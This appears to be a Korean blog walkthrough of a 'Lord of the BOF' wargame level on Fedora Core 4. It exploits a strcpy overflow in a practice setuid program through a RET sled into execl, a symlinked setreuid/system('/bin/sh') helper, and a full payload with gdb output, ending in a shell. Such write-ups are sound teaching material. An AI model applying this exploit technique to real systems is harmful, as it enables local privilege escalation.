/*

The Lord of the BOF : The Fellowship of the BOF 

- cruel

- Local BOF on Fedora Core 4

- hint : no more fake ebp, RET sleding on random library

*/


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

 

int main(int argc, char *argv[])

{

    char buffer[256];


    if(argc < 2){

        printf("argv error\n");

        exit(0);

    }


    strcpy(buffer, argv[1]);

    printf("%s\n", buffer);

}




이 문제도 strcpy함수에 의해 buffer에 복사할 때 오버플로우가 발생한다.

그러면 execl함수를 사용하여 ret sleding하면서 스택에 박혀있는 쓰레기 값을 첫번째 인자로 만들어 준 뒤

그 첫번째 인자의 문자열을 심볼릭 링크를 걸고 공격하는 방법으로 공략하겠습니다.


[출처] http://smleenull.tistory.com/305

**주의할점**

(execl()함수의 두 번째 인자로 들어가는 값이 0x00000000인 경우엔 segmentation default가 뜬다.)




(gdb) p execl

$1 = {<text variable, no debug info>} 0x832d68 <execl>

0x08048451 <main+109>: ret    


RET = 0x08048451

execl  = 0x832d68




(gdb) b* main+109      // ret부분

Breakpoint 1 at 0x8048451

(gdb) r `python -c 'print "A"*260+"BBBB"'`

Starting program: /home/dark_stone/crue3 `python -c 'print "A"*260+"BBBB"'`

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x9b2000

(no debugging symbols found)

(no debugging symbols found)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB



Breakpoint 1, 0x08048451 in main ()

(gdb) x/30wx $esp

0xbfc417bc: 0x42424242 0x00000000 0xbfc41844 0xbfc41850

0xbfc417cc: 0xbfc41800 0x00795898 0x007a3878 0xb7f41690

0xbfc417dc: 0x00000001 0x008caff4 0x007a2ca0  0x08048454

0xbfc417ec: 0xbfc41818 0xbfc417c0 0x007bad44 0x00000000

0xbfc417fc:       0x00000000 0x00000000 0x0079ae60 0x0079613d

0xbfc4180c: 0x007a2fb4 0x00000002 0x08048340 0x00000000

0xbfc4181c: 0x08048361 0x080483e4 0x00000002 0xbfc41844

0xbfc4182c: 0x08048454 0x080484b0


(gdb) r
Breakpoint 1, 0x08048451 in main ()
(gdb) x/30wx $esp
0xbfc5e05c: 0x42424242 0x00000000 0xbfc5e0e4 0xbfc5e0f0
0xbfc5e06c: 0xbfc5e0a0 0x00795898 0x007a3878 0xb7f60690
0xbfc5e07c: 0x00000001 0x008caff4 0x007a2ca0 0x08048454
0xbfc5e08c: 0xbfc5e0b8 0xbfc5e060 0x007bad44 0x00000000
0xbfc5e09c: 0x00000000 0x00000000 0x0079ae60 0x0079613d
0xbfc5e0ac: 0x007a2fb4 0x00000002 0x08048340 0x00000000
0xbfc5e0bc: 0x08048361 0x080483e4 0x00000002 0xbfc5e0e4
0xbfc5e0cc: 0x08048454 0x080484b0
(gdb) 

// 저기 밑줄 친 부분들은 여러번 다시 실행시켜도 고정적인 값이다. 그러므로 저 부분을 execl 인자로 사용하여 공략하면 된다.


(gdb) r `python -c 'print "A"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Breakpoint 1, 0x08048451 in main ()
(gdb) x/30wx $esp
0xbfb7df8c: 0x08048451 0x08048451 0x08048451 0x08048451   // ret주소
0xbfb7df9c: 0x08048451 0x08048451 0x08048451 0x00832d68  // execl 주소
0xbfb7dfac: 0x00000001 0x008caff4 0x007a2ca0 0x08048454  // execl 인자들
0xbfb7dfbc: 0xbfb7dfe8 0xbfb7df90 0x007bad44 0x00000000
0xbfb7dfcc: 0x00000000 0x00000000 0x0079ae60 0x0079613d
0xbfb7dfdc: 0x007a2fb4 0x00000002 0x08048340 0x00000000
0xbfb7dfec: 0x08048361 0x080483e4 0x00000002 0xbfb7e014
0xbfb7dffc: 0x08048454 0x080484b0


그러면 첫번째 인자(실행파일)의 문자열을 구해보자.

(gdb) x/10bx 0x008caff4
0x8caff4: 0x3c 0xad 0x8c 0x00 0x16 0xab 0x7b 0x00
0x8caffc: 0x00 0x00

// 실행 파일명이 0x3c 0xad 0x8c이다.  이 부분을 심볼릭 링크하자.
========================================================
[dark_stone@Fedora_2ndFloor ~]$ cat getsh.c 
#include<stdio.h>

int main()
{
setreuid(501,501);  //501은 cruel uid,gid
system("/bin/sh");
}
========================================================

[dark_stone@Fedora_2ndFloor ~]$ ln -s getsh "`python -c 'print "\x3c\xad\x8c"'`"



[dark_stone@Fedora_2ndFloor ~]$ ./cruel `python -c 'print "A"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh- 

sh-3.00$ id

uid=501(cruel) gid=500(dark_stone) groups=500(dark_stone) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 501

come on, come over

sh-3.00$ 



'System Hacking > LOB_fedora' 카테고리의 다른 글

[Fedora4] enigma -> titan  (0) 2015.12.01
[Fedora4] cruel -> enigma  (0) 2015.11.29
[Fedora3] evil_wizard -> dark_stone  (0) 2015.11.25
[Fedora3] hell_fire -> evil_wizard  (0) 2015.11.23
[Fedora3] dark_eyes -> hell_fire  (0) 2015.11.22

+ Recent posts